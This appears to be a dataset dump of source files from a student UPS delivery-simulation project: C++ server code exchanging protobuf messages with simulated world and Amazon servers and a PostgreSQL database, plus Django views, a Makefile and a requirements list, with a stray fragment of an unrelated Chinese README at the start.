2.发提测邮件:\n 1)选择已经创建的提测模版 然后等待用户对模版做最后的改动,最后提测\n\n# 说明\n## 1.其中创建提测项目时,输入中文项目名称会根据中文翻译成英文拼上时间填入分支项并git切分支\n## 2.发邮件时,拉git分支和master对比,然后筛选出开发者\n## 3.发邮件时,会通过gitee api创建pr 然后通过pr获取commit list,然后对commit list进行过滤最后写入备注中(备注内容为开发修改了什么)\n" } ]
8
rijish45/UPS
https://github.com/rijish45/UPS
f5e0c0eb1f99fee420043fb6a64b0071069b7211
21331e2a266cdc3c18476f285817c125622ecc32
13f08981b436524ce1ca0e88b8d47776d07e0402
refs/heads/master
2020-05-07T12:15:49.343821
2019-05-01T16:32:04
2019-05-01T16:32:04
180,496,631
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7435687184333801, "alphanum_fraction": 0.7454844117164612, "avg_line_length": 37.05208206176758, "blob_id": "3113e81c7f567565a06bc0a4fe2d742718c82cd2", "content_id": "3e49796d058a5ce6ae8028624b148fc1cb4a97e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3654, "license_type": "no_license", "max_line_length": 243, "num_lines": 96, "path": "/Server-App/server/handle_requests.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef _HANDLE_REQUESTS_\n#define _HANDLE_REQUESTS_\n\n#include <iostream>\n#include <cstdlib>\n#include <algorithm>\n#include <cmath>\n#include <ctime>\n#include <vector>\n#include <pqxx/pqxx>\n#include <string>\n#include <fstream>\n#include <mutex>\n\n\nusing namespace std;\nusing namespace pqxx;\n\n//New function\nstring get_owner_id_from_username(connection * C, string username);\n\n\n//max fucntions\n//Get max-num\nint max_sequence_num(connection * C);\nint max_package_num(connection * C);\nint max_order_id(connection * C);\n\n\n/*\n vector < vector<string> > my_vec (1000);\n get_parameter_based_on_dest(C, my_vec);\n for (int it = 0; it != my_vec.size(); it++){\n for(int i = 0; i != 3; i++)\n cout << my_vec[it][i] << endl;\n }\n */\n\n\nvoid get_parameter_based_on_dest(connection * C, vector< vector<string> > & my_vec);\nvoid packed_packages(connection * C, vector<int> & package_vec, string whx_position, string why_position, string truck_id);\nbool packageExist(connection * C, string packageid);\nbool isExist(connection * C, string username);\nvoid drop_all_tables(connection * C);\n\n\n//functions for order_table\nvoid insert_into_order_table(connection * C, string orderid, string package_num_id);\nstring get_package_id_for_order(connection * C, string order_id);\nstring get_order_id_for_package(connection * C, string package_id);\n\n\n//World table functions\nvoid insert_current_world_id(connection * C, string name, string worldid, string id);\nstring get_world_id(connection * C, string name);\n\n\n//functions you wanted\nvoid update_truck_field_of_package(connection * C, string packageid, string value);\nvoid update_acked_of_seqnum(connection * C, string seq, bool val);\nbool get_seqnum_acked_or_not(connection * C, string seqnum); \n\n\n//Update functions\nvoid update_package_destination(connection * C, string packageid, string new_x, string new_y);\nvoid update_package_warehouse_location_and_id(connection * C, string warehouse_id, string warehouse_x, string warehouse_y, string packageid);\nvoid update_status_of_package (connection * C, string packageid, string new_status);\nvoid update_truck_status(connection * C, string truck_id, string new_status);\nvoid update_location_of_package(connection * C, string x_position, string y_position);\n\n//Insert functions\nvoid insert_package(connection * C, string packageid, string username, string truck_id, string item, string status, string warehouse_id, string warehouse_x , string warehouse_y, string x_position, string y_position, string destination_update);\nvoid insert_truck(connection * C, string truckid, string status);\nvoid insert_sequence_num(connection * C, string seq_num, string ackedornot);\nvoid clear_all_tables(connection * C);\nbool check_seq_num_exists(connection * C, string seq_num);\n\n\n//Get item from package table\nstring get_truck_id_for_a_particular_package(connection * C, string packageid); //new\nstring get_xposition_of_a_package(connection * C, string packageid); //new\nstring get_yposition_of_a_package(connection * C, string packageid); //new\nstring get_package_status(connection * C, string packageid); //new\nstring get_item_description(connection * C, string packageid); //new\nstring get_warehouse_id_of_package(connection * C, string packageid);\nstring get_warehouse_xposition(connection * C, string packageid); //new\nstring get_warehouse_yposition(connection * C, string packageid); //new\nstring get_owner_id_of_package(connection * C, string packageid); //new\nstring get_username(connection *C , string packageid);\n\n//Get item from truck table\nstring get_truck_status(connection * C, string truckid);\nstring get_truck_id_for_a_particular_status(connection * C, string status);\n\n\n#endif\n\n" }, { "alpha_fraction": 0.6216922998428345, "alphanum_fraction": 0.6353846192359924, "avg_line_length": 29.06046485900879, "blob_id": "c126d27eb39c9508e67041a3d4a802d21e2ac76c", "content_id": "febe283bc4bcff69ceec0bbe7646378b616b4bc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6500, "license_type": "no_license", "max_line_length": 86, "num_lines": 215, "path": "/Server-App/server/amazonMsg.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"amazonMsg.hpp\"\n\n// Listener amazonMsg::listener;\nConnector amazonMsg::connector;\namazonMsg * amazonMsg::instance = 0;\ngoogle::protobuf::io::FileOutputStream * amazonMsg::out;\ngoogle::protobuf::io::FileInputStream * amazonMsg::in;\nListener amazonMsg::listener;\ngoogle::protobuf::io::FileOutputStream * amazonMsg::listenerOut = nullptr;\ngoogle::protobuf::io::FileInputStream * amazonMsg::listenerIn = nullptr;\nmutex amazonMsg::mtx_connector_in;\nmutex amazonMsg::mtx_connector_out;\nmutex amazonMsg::mtx_listener_in;\nmutex amazonMsg::mtx_listener_out;\nSocket amazonMsg::tempListener;\n\namazonMsg * amazonMsg::getInstance() {\n if (instance == 0) {\n instance = new amazonMsg();\n connector = move(Connector(CONNECT_HOST , CONNECT_PORT));\n out = new google::protobuf::io::FileOutputStream(connector.getSocket());\n in = new google::protobuf::io::FileInputStream(connector.getSocket());\n listener = Listener(LISTEN_PORT);\n }\n return instance;\n}\n\nvoid amazonMsg::acceptConnection() {\n if (listenerOut != nullptr) {\n delete(listenerOut);\n }\n if (listenerIn != nullptr) {\n delete(listenerIn);\n }\n tempListener = listener.Accept();\n // cout << tempListener.getSocket() << endl;\n listenerOut = new google::protobuf::io::FileOutputStream(tempListener.getSocket()); \n listenerIn = new google::protobuf::io::FileInputStream(tempListener.getSocket());\n}\n\nbool amazonMsg::buildConnection(int worldid) {\n U2AConnect uconnect;\n uconnect.set_worldid(worldid);\n sendMesgTo(uconnect, out);\n U2AConnected response;\n cout << \"DEBUG CONNECTION\" << endl;\n recvMesgFrom(response, in);\n cout << \"Message is \" << endl;\n // cout << response.DebugString();\n if (response.result() == \"connected!\") {\n cout << response.result() << endl;\n return true;\n }\n return false;\n}\n\n// message PickupResponse{\n// required int64 seqnum = 1;\n// required int64 tracknum = 2;\n// required int64 orderid = 3;\n// required int64 truckid = 4;\n// }\n\nvoid amazonMsg::pickUpRes(int seqnum, int tracknum, int orderid, int truckid) {\n U2AResponse response;\n PickupResponse * pickup = response.add_pickup();\n pickup->set_seqnum(seqnum);\n pickup->set_tracknum(tracknum);\n pickup->set_orderid(orderid);\n pickup->set_truckid(truckid);\n lock_guard<mutex> lck (mtx_listener_out);\n cout << \"PICKUPRES\" << endl;\n sendMesgTo(response, listenerOut);\n}\n\n// message DeliveryResponse{\n// required int64 seqnum = 1;\n// required int64 tracknum = 2;\n// }\n \nvoid amazonMsg::deliverRes(int seqnum, int tracknum) {\n U2AResponse response;\n DeliveryResponse * delivery = response.add_delivery();\n delivery->set_seqnum(seqnum);\n delivery->set_tracknum(tracknum);\n lock_guard<mutex> lck (mtx_listener_out);\n sendMesgTo(response, listenerOut);\n}\n\n// message ErrorMessage{\n// required string err = 1;\n// required int64 originseqnum = 2;\n// required int64 seqnum = 3;\n// }\n\nvoid amazonMsg::sendError(string err, int originseqnum, int seqnum) {\n U2AResponse response;\n ErrorMessage * error = response.add_error();\n error->set_err(err);\n error->set_originseqnum(originseqnum);\n error->set_seqnum(seqnum);\n lock_guard<mutex> lck (mtx_listener_out);\n sendMesgTo(response, listenerOut);\n}\n\nvoid amazonMsg::sendAck(int ack) {\n U2AResponse response;\n response.add_ack(ack);\n lock_guard<mutex> lck (mtx_listener_out);\n sendMesgTo(response, listenerOut);\n}\n\n// message A2URequest {\n// repeated PickupRequest pickup = 1;\n// repeated DeliveryRequest delivery = 2;\n// repeated int64 ack = 3;\n// }\nvoid amazonMsg::receiveRes(A2URequest & req) {\n lock_guard<mutex> lck (mtx_listener_in);\n recvMesgFrom(req, listenerIn);\n \n // if (req.pickup_size() != 0) {\n // for (int i = 0; i < req.pickup_size(); i++) {\n // cout << \"pickup requset from amazon\" << endl;\n // cout << req.pickup(i).seqnum() << endl;\n // cout << req.pickup(i).orderid() << endl;\n // cout << req.pickup(i).productname() << endl;\n // cout << req.pickup(i).wh_id() << endl;\n // cout << req.pickup(i).wh_x() << endl;\n // cout << req.pickup(i).wh_y() << endl;\n // cout << req.pickup(i).dest_x() << endl;\n // cout << req.pickup(i).dest_y() << endl;\n // if (req.pickup(i).has_upsaccount()) {\n // \tcout << req.pickup(i).upsaccount() << endl;\n // }\n // }\n // }\n\n // if (req.ack_size() != 0) {\n // for (int i = 0; i < req.ack_size(); i++) {\n // cout << \"ack from amazon\" << endl;\n // cout << req.ack(i) << endl;\n // }\n // }\n\n // message DeliveryRequest{\n // required int64 seqnum = 1;\n // required int64 tracknum = 2;\n // }\n \n // if (req.delivery_size() != 0) {\n // for (int i = 0; i < req.delivery_size(); i++) {\n // cout << \"delivery request from amazon\" << endl;\n // req.delivery(i).seqnum();\n // req.delivery(i).tracknum();\n // }\n // }\n \n}\n\n\n// message UpdateDest{\n// required int64 seqnum = 1;\n// required int64 tracknum = 2;\n// required int64 new_x = 3;\n// required int64 new_y = 4;\n// required string newDest = 3;\n// }\nvoid amazonMsg::updateDestination(int seqnum, int tracknum, int new_x, int new_y) {\n U2ARequest req;\n UpdateDest * updatedAddr = req.add_dest();\n updatedAddr->set_seqnum(seqnum);\n updatedAddr->set_tracknum(tracknum);\n updatedAddr->set_new_x(new_x);\n updatedAddr->set_new_y(new_y);\n lock_guard<mutex> lck (mtx_connector_out);\n sendMesgTo(req, out);\n}\n\nvoid amazonMsg::sendAck22222(int ack) {\n U2ARequest req;\n req.add_ack(ack);\n lock_guard<mutex> lck (mtx_connector_out);\n sendMesgTo(req, out);\n}\n\n\n// message ErrorMessage{\n// required string err = 1;\n// required int64 originseqnum = 2;\n// required int64 seqnum = 3;\n// }\n\nvoid amazonMsg::receiveDestUpdatedRes(A2UResponse & response) {\n lock_guard<mutex> lck (mtx_connector_in);\n recvMesgFrom(response, in);\n \n // if (response.error_size() != 0) {\n // for (int i = 0; i < response.error_size(); i++) {\n // cout << \"error message from amazon\" << endl;\n // cout << response.error(i).err() << endl;\n // cout << response.error(i).originseqnum() << endl;\n // cout << response.error(i).seqnum() << endl;\n // // amazon->sendAck22222(response.error(i).seqnum());\n // }\n // }\n\n // if (response.ack_size() != 0) {\n // for (int i = 0; i < response.ack_size(); i++) { \n // cout << \"ack from amazon\" << endl;\n // cout << response.ack(i) << endl;\n // // update_acked_of_seqnum(C, to_string(response.ack(i)), true)\n // }\n // }\n}\n\n\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6897374987602234, "alphanum_fraction": 0.6897374987602234, "avg_line_length": 36.818180084228516, "blob_id": "f6ae806d89e04f36659f411bbeec33e6d3bde33f", "content_id": "f4a590922250be5839bcfd08f7a81f4a6b819925", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 419, "license_type": "no_license", "max_line_length": 104, "num_lines": 11, "path": "/Django-App/web-app/upsApp/urls.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'upsApp'\nurlpatterns = [\n path('', views.PackageListView.as_view(), name='packages'),\n path('<int:pk>/update/', views.PackageUpdate.as_view(), name='package_update'),\n path('shipment/', views.ShipmentListView.as_view(), name='shipment'),\n path('shipment/search', views.ShipmentSearchListView.as_view(), name='shipment_search_list_view'), \n]\n\n\n\n" }, { "alpha_fraction": 0.71100914478302, "alphanum_fraction": 0.71100914478302, "avg_line_length": 30.035715103149414, "blob_id": "fac461b59828e44a0a396da3b6006a14437c05c1", "content_id": "54022c07be33febbabf7bc0b7df596b17c79136a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 872, "license_type": "no_license", "max_line_length": 67, "num_lines": 28, "path": "/Django-App/web-app/accounts/views.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views import generic\nfrom django.contrib.auth import login, authenticate\nfrom .forms import UserForm\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\n\ndef signup(request):\n\tif request.method == 'POST':\n\t\tform = UserForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnewUser = User.objects.create(\n\t\t\t\tusername = form.cleaned_data.get('username'),\n\t\t\t)\n\t\t\tnewUser.set_password(form.cleaned_data.get('password'))\n\t\t\tnewUser.save() \n\t\t\ttempUser = authenticate(\n\t\t\t\tusername = form.cleaned_data.get('username'), \n\t\t\t\tpassword = form.cleaned_data.get('password'),\n\t\t\t)\n\t\t\tlogin(request, tempUser)\n\t\t\treturn redirect('/') # direct to the home page\n\telse:\n\t\tform = UserForm()\n\treturn render(request, 'registration/signup.html', {'form': form})\n\n\n\n" }, { "alpha_fraction": 0.5661538243293762, "alphanum_fraction": 0.5753846168518066, "avg_line_length": 15.25, "blob_id": "623288fb9079e57ba38eb1ddeacb1954b79c7e68", "content_id": "999aa9eb4832d19f52927216a03f23fd1f0b864d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 325, "license_type": "no_license", "max_line_length": 52, "num_lines": 20, "path": "/Server-App/server/Makefile", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "CFLAGS=-std=c++14 -pedantic -Wall -O3\nSRCS=$(wildcard *.cpp)\nOBJS=$(patsubst %.cpp, %.o, $(SRCS))\n\nserver: $(OBJS)\n\tg++ -o $@ $(OBJS) -lpq -lpthread -lpqxx -lprotobuf\n\n\n%.o:%.cpp\n\tg++ $(CFLAGS) -c $<\n\n.PHONY: clean depend\nclean:\n\trm -f server *.o *~ *\\#\n\ndepend:\n\tmakedepend $(SRCS)\n # DO NOT DELETE\n\n# DO NOT DELETE\n" }, { "alpha_fraction": 0.746835470199585, "alphanum_fraction": 0.8101266026496887, "avg_line_length": 10.285714149475098, "blob_id": "7c07085384700ef307c6ff4cab900069434d11b5", "content_id": "e16d8a491cb68911e91004f1b4e9184a46954f43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 79, "license_type": "no_license", "max_line_length": 19, "num_lines": 7, "path": "/Server-App/server/requirements.txt", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "Django>=2.0,<3.0\nprotobuf\nsqlalchemy\ndjango-crispy-forms\npsycopg2\nPillow\nnumpy\n" }, { "alpha_fraction": 0.6967471241950989, "alphanum_fraction": 0.6988457441329956, "avg_line_length": 25.47222137451172, "blob_id": "649ef678beabc63fd696349d24ce87ad2961c3d5", "content_id": "e7b273b1917e211eb485c8c1bff3657047896ebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1906, "license_type": "no_license", "max_line_length": 86, "num_lines": 72, "path": "/Server-App/server/socket.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef __SOCKET__\n#define __SOCKET__\n\n#include <cstdio>\n#include <cstdlib>\n#include <iostream>\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <cstring>\n#include <netdb.h>\n#include <utility>\n#include <google/protobuf/message.h>\n#include <google/protobuf/descriptor.h>\n#include <google/protobuf/io/zero_copy_stream_impl.h>\n#include <google/protobuf/io/coded_stream.h>\n#include <google/protobuf/io/zero_copy_stream_impl_lite.h>\n#include \"world_ups.pb.h\"\n#include \"UA.pb.h\"\n\n#define BUF_SIZE 812 \n#define CH_SIZE 1\n\nusing namespace std;\n\nclass Socket {\nprotected:\n int socket_fd;\nprivate:\n string recvMessage(size_t bytes); // reveive all message (unnecessary to be virtual)\n int parseBytes();\npublic:\n const int getSocket() const { return socket_fd; };\n Socket();\n Socket(int __socket_fd);\n Socket(const Socket & rhs) = delete; // copy constructor\n Socket & operator=(const Socket & rhs) = delete; // assignment operator\n Socket(Socket && rhs) noexcept;\n Socket& operator=(Socket && rhs) noexcept;\n bool isValid();\n virtual ~Socket();\n};\n\nclass Listener : public Socket {\n // socket_fd\n const char * port;\npublic:\n Listener() = default;\n Listener(const char * _port);\n Listener(const Listener & rhs) = delete; // copy constructor\n Listener & operator=(const Listener & rhs) = delete; // assignment operator \n Listener(Listener && rhs) noexcept;\n Listener & operator=(Listener && rhs) noexcept;\n Socket Accept();\n ~Listener();\n};\n\nclass Connector : public Socket {\n const char * host;\n const char * port;\npublic:\n Connector() = default;\n Connector(const char * host, const char * port);\n Connector(const Connector & rhs) = delete; // copy constructor\n Connector & operator=(const Connector & rhs) = delete; // assignment operator\n Connector (Connector && rhs) noexcept;\n Connector & operator=(Connector && rhs) noexcept;\n ~Connector();\n};\n\n\n#endif\n" }, { "alpha_fraction": 0.7124541997909546, "alphanum_fraction": 0.7344322204589844, "avg_line_length": 22.399999618530273, "blob_id": "9fa7437031e426402f2c7b557eeefa1bad35b981", "content_id": "eeab128d3d5802e6b6839301061cc2ae9965c580", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1638, "license_type": "no_license", "max_line_length": 56, "num_lines": 70, "path": "/Server-App/server/thread.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef __THREAD__\n#define __THREAD__\n\n// PORT\n#define WORLD_HOST \"vcm-8273.vm.duke.edu\"\n// #define WORLD_HOST \"vcm-5947.vm.duke.edu\"\n#define WORLD_PORT \"12345\"\n#define AMAZON_HOST \"vcm-7975.vm.duke.edu\"\n// #define AMAZON_PORT \"22222\"\n#define TIME_RETRY 10\n#define NUM_TRUCKS 10\n\n// DATABSSE\n#define DBNAME \"ups_db\"\n#define USERNAME \"postgres\"\n#define PASSWORD \"password\"\n#define HOST \"db\"\n#define PORT \"5432\"\n\n// package status\n#define PACKAGE_PACKED \"PD\"\n#define PACKAGE_LOADING \"LG\"\n#define PACKAGE_LOADED \"LD\"\n#define PACKAGE_DELIVERING \"DG\"\n#define PACKAGE_DELIVERED \"DD\"\n\n// truck status\n#define TRUCK_IDLE \"ID\"\n#define TRUCK_TRAVELING \"TR\"\n#define TRUCK_ARRIVE_WAREHOUSE \"AW\"\n#define TRUCK_LOADING \"LO\"\n#define TRUCK_DELIVERING \"DE\"\n\n\n#include \"handle_requests.hpp\"\n#include \"amazonMsg.hpp\"\n#include \"worldMsg.hpp\"\n#include <cstdio>\n#include <cstdlib>\n#include <pqxx/pqxx>\n#include <iostream>\n#include <string>\n#include <thread> // std::thread\n#include <mutex> // std::mutex, std::lock_guard\n#include <unordered_map>\n#include <chrono>\n#include <thread>\n\nusing namespace std;\nusing namespace pqxx; \n\nstatic int worldId = -1;\nstatic connection * C;\nstatic mutex mtx;\nstatic int mySeqNum = 0;\n// static int myPackageNum = 0;\nstatic unordered_map<string, string> packageStatus;\nstatic unordered_map<string, string> truckStatus;\nstatic int countTruck = 0;\n\nvoid setUpEnvironment();\nvoid worldSide();\nvoid amazonSide();\nvoid initializeStatusMap();\nvoid iterateStatusMap();\nvoid iterateUResponses(UResponses & response);\nvoid iterateA2URequest(A2URequest & req);\nvoid updateAddress();\nvoid recvAdreUpdatedACK();\n#endif\n" }, { "alpha_fraction": 0.579033374786377, "alphanum_fraction": 0.5855003595352173, "avg_line_length": 36.466835021972656, "blob_id": "448c5248647c7b095be583d172de2bf0f06f7390", "content_id": "4595e55eb32b18afbabb283f41d28672bec0f547", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 14694, "license_type": "no_license", "max_line_length": 136, "num_lines": 392, "path": "/Server-App/server/thread.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"thread.hpp\"\n\n \nvoid setUpEnvironment() {\n try {\n string connectionUrl = \"dbname=\"+string(DBNAME)+\" user=\"+USERNAME+\" password=\"+PASSWORD+\" host=\"+HOST;\n // string connectionUrl = \"dbname=\"+string(DBNAME)+\" user=\"+USERNAME+\" password=\"+PASSWORD;\n cout << connectionUrl << endl;\n C = new connection(connectionUrl);\n if (C->is_open()) {\n cout << \"Opened database successfully: \" << C->dbname() << endl;\n } else {\n cout << \"Can't open database\" << endl;\n exit(1);\n }\n // C->disconnect();\n } catch (const std::exception &e) {\n cerr << e.what() << std::endl;\n exit(1);\n }\n clear_all_tables(C);\n // initiaize seq and packid\n //int tempseq = max_sequence_num(C);\n // int temppack = max_package_num(C);\n // if (tempseq > 0) {\n // mySeqNum = tempseq + 1;\n // }\n // if (temppack > 0) {\n // myPackageNum = temppack + 1;\n // }\n \n // initialize status map\n initializeStatusMap();\n \n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT); // works\n amazonMsg * amazon = amazonMsg::getInstance();\n\n // connect and create a new world\n for (int i = 0; i < TIME_RETRY; i++) {\n if (i == TIME_RETRY) {\n perror(\"FAILED TO CONNECT TO WORLD\");\n exit(EXIT_FAILURE);\n }\n if (world->createWorld(false, worldId, true, NUM_TRUCKS, 0, 0, worldId, C)) { // works\n break;\n }\n }\n \n cout << \"newCreated World Id is \" << worldId << endl; \n \n // AMAZON reqired to test\n for (int i = 0; i < TIME_RETRY; i++) {\n if (i == TIME_RETRY) {\n perror(\"FAILED TO CONNECT TO AMAZON\");\n exit(EXIT_FAILURE);\n }\n if (amazon->buildConnection(worldId)) {\n cout << \"connected(amazon)!!!!!\";\n break;\n }\n }\n\n\n // cout << \"-----------------------------------------------\" << endl;\n // world->goPickUp(0, 1, 0); // tested\n // cout << \"-----------------------------------------------\" << endl;\n // world->goDeliver(1, 1, 1, 1, 1); // tested\n // cout << \"-----------------------------------------------\" << endl;\n // world->goQuery(1, 4); // tested\n // UResponses response1;\n // world->recvResponse(response1);\n // cout << \"-----------------------------------------------\" << endl;\n // UResponses response2;\n // world->goQuery(1, 3);\n // world->recvResponse(response2);\n // UResponses response;\n // world->changeSpeed(200);\n // world->recvResponse(response);\n // world->disconnect(true); // tested\n\n // set up DB Connection here\n \n // wait\n cout << \"accept\" << endl;\n amazon->acceptConnection();\n // cout << \"HIHIHIHI\" << endl;\n // drop_all_tables( C);\n}\n\nvoid initializeStatusMap() {\n truckStatus[\"IDLE\"] = \"ID\";\n truckStatus[\"TRAVELING\"] = \"TR\";\n // arrive warehouse\n truckStatus[\"ARRIVE WAREHOUSE\"] = \"AW\";\n truckStatus[\"LOADING\"] = \"LO\";\n truckStatus[\"DELIVERING\"] = \"DE\";\n packageStatus[\"loading\"] = \"LG\";\n packageStatus[\"loaded\"] = \"LD\";\n packageStatus[\"delivering\"] = \"DG\";\n packageStatus[\"delivered\"] = \"DD\";\n packageStatus[\"packed\"] = \"PD\";\n}\n\nvoid worldSide() {\n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n amazonMsg * amazon = amazonMsg::getInstance();\n while (true) {\n UResponses response;\n world->recvResponse(response);\n iterateUResponses(response); \n }\n}\n\nvoid iterateUResponses(UResponses & response) {\n \n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n amazonMsg * amazon = amazonMsg::getInstance();\n \n if (response.completions_size() != 0) { // handled\n for (int i = 0; i < response.completions_size(); i++) {\n // debug\n cout << \"completions sent back \" << endl;\n cout << \"truckId:\" << response.completions(i).truckid() << endl;\n cout << \"x:\" << response.completions(i).x() << endl;\n cout << \"y:\" << response.completions(i).y() << endl;\n cout << \"status:\" << response.completions(i).status() << endl;\n cout << \"seqnum:\" << response.completions(i).seqnum() << endl; \n cout << response.DebugString() << endl;\n // update db and send ack message\n world->sendAck(response.completions(i).seqnum());\n string thisTruckStatus = response.completions(i).status();\n int thisTruckId = response.completions(i).truckid();\n // cout << \"--------------------------\" << endl;\n // cout << thisTruckStatus << endl;\n // ARRIVE WAREHOUSE\n if (thisTruckStatus == \"ARRIVE WAREHOUSE\") {\n\t// cout << \"--------------------------\" << endl;\n\tvector<int> packed;\n\tpacked_packages(C, packed, to_string(response.completions(i).x()), to_string(response.completions(i).y()), to_string(thisTruckId));\n\t// cout << \"--------------------------\" << endl;\n\t// cout << \"packed size \" << packed.size() << endl;\n\t// cout << response.completions(i).x() << endl;\n\t// cout << response.completions(i).y() << endl;\n\t// cout << response.completions(i).truckid() << endl;\n\tlock_guard<mutex> lock(mtx);\n\tfor (unsigned i = 0; i < packed.size(); i++) {\n\t // int tempPackageId = get_order_id_for_package(C, packed[i]);\n\t int tempOrderId = stoi(get_order_id_for_package(C, to_string(packed[i])));\n\t update_status_of_package(C, to_string(packed[i]), PACKAGE_LOADING);\n\t amazon->pickUpRes(mySeqNum, packed[i], tempOrderId, thisTruckId);\n\t // amazon->updateDestination(444, packed[i], 3, 3);\n\t insert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t ++mySeqNum;\n\t // ++myPackageNum\n\t}\n }\n update_truck_status(C, to_string(response.completions(i).truckid()), truckStatus[response.completions(i).status()]);\n // update_truck_status(C, string(3), statusMap[response.completions(i).status()]);\n world->sendAck(response.completions(i).seqnum()); \n } \n }\n\n if (response.delivered_size() != 0) {\n for (int i = 0; i < response.delivered_size(); i++) {\n // update\n // update(packageid, status);\n cout << \"delievered sent back \" << endl;\n cout << \"truckId:\" << response.delivered(i).truckid() << endl;\n cout << \"packageId:\" << response.delivered(i).packageid() << endl;\n cout << \"seqnum:\" << response.delivered(i).seqnum() << endl;\n // todo : function(packageId) // set the foreign key(points to truck) of the packageid to null\n update_status_of_package(C, to_string(response.delivered(i).packageid()), PACKAGE_DELIVERED);\n world->sendAck(response.delivered(i).seqnum());\n // send amazon\n lock_guard<mutex> lck(mtx);\n amazon->deliverRes(mySeqNum, response.delivered(i).packageid());\n insert_sequence_num(C, to_string(mySeqNum), \"False\");\n mySeqNum++;\n }\n } \n\n if (response.truckstatus_size() != 0) {\n for (int i = 0; i < response.truckstatus_size(); i++) {\n cout << \"truck status send back\" << endl;\n cout << response.truckstatus(i).truckid() << endl;\n cout << response.truckstatus(i).status() << endl;\n cout << response.truckstatus(i).x() << endl;\n cout << response.truckstatus(i).y() << endl;\n cout << response.truckstatus(i).seqnum() << endl;\n // update(int truckId, int x, int y, string status); \n update_truck_status(C, to_string(response.truckstatus(i).truckid()), truckStatus[response.truckstatus(i).status()]);\n world->sendAck(response.truckstatus(i).seqnum());\n }\n }\n\n \n if (response.error_size() != 0) { // error : do nothing\n for (int i = 0; i < response.error_size(); i++) {\n cout << \"error sent back \" << endl;\n cout << response.error(i).err() << endl;\n cout << response.error(i).originseqnum() << endl;\n cout << response.error(i).seqnum() << endl;\n world->sendAck(response.error(i).seqnum());\n }\n }\n\n if (response.has_finished()) { // I will never send disconnect\n cout << \"finished snet back \" << response.finished() << endl;\n }\n \n if (response.acks_size() != 0) {\n for (int i = 0; i < response.acks_size(); i++) {\n cout << \"ack sent back\" << endl;\n cout << response.acks(i) << endl;\n // todo: update the corresponding seqnum to acked\n update_acked_of_seqnum(C, to_string(response.acks(i)), true);\n }\n } \n}\n\nvoid amazonSide() {\n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n amazonMsg * amazon = amazonMsg::getInstance();\n while (true) {\n A2URequest req;\n amazon->receiveRes(req);\n iterateA2URequest(req);\n }\n}\n\nvoid iterateA2URequest(A2URequest & req) {\n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n amazonMsg * amazon = amazonMsg::getInstance();\n\n if (req.pickup_size() != 0) {\n for (int i = 0; i < req.pickup_size(); i++) {\n cout << \"pickup requset from amazon\" << endl;\n cout << req.pickup(i).seqnum() << endl;\n cout << req.pickup(i).orderid() << endl;\n cout << req.pickup(i).productname() << endl;\n cout << req.pickup(i).wh_id() << endl;\n cout << req.pickup(i).wh_x() << endl;\n cout << req.pickup(i).wh_y() << endl;\n cout << req.pickup(i).dest_x() << endl;\n cout << req.pickup(i).dest_y() << endl;\n\n string account = \"\";\n if (req.pickup(i).has_upsaccount()) {\n\tcout << req.pickup(i).upsaccount() << endl;\n\taccount = req.pickup(i).upsaccount();\n }\n \n lock_guard<mutex> lck(mtx);\n amazon->sendAck(req.pickup(i).seqnum());\n \n // create the package in local database and assign the package to a truck\n if (req.pickup(i).has_upsaccount() && !isExist(C, account)) {\n\tcout << \"The user account does not exit\" << endl;\n\tamazon->sendError(\"account not exist\", req.delivery(i).seqnum(), mySeqNum);\n\tinsert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t++mySeqNum;\n\tcontinue;\n }\n int truckIdAssigned = countTruck % NUM_TRUCKS;\n ++countTruck;\n cout << account << endl;\n insert_package(C, to_string(to_string(req.pickup(i).orderid())), account, to_string(truckIdAssigned), req.pickup(i).productname(),\n\t\t PACKAGE_PACKED, to_string(req.pickup(i).wh_id()), to_string(req.pickup(i).wh_x()),\n\t\t to_string(req.pickup(i).wh_y()), to_string(req.pickup(i).dest_x()), to_string(req.pickup(i).dest_y()), \"False\");\n \n insert_into_order_table(C, to_string(req.pickup(i).orderid()), to_string(to_string(req.pickup(i).orderid())));\n // update the truck status\n update_truck_status(C, to_string(truckIdAssigned), TRUCK_TRAVELING);\n // update_status_of_package(C, myPackageNum, \"PD\");\n // send the emssage to truck\n\n cout << \"fdsjfjdslajflkdsj\" << endl;\n cout << truckIdAssigned << endl;\n 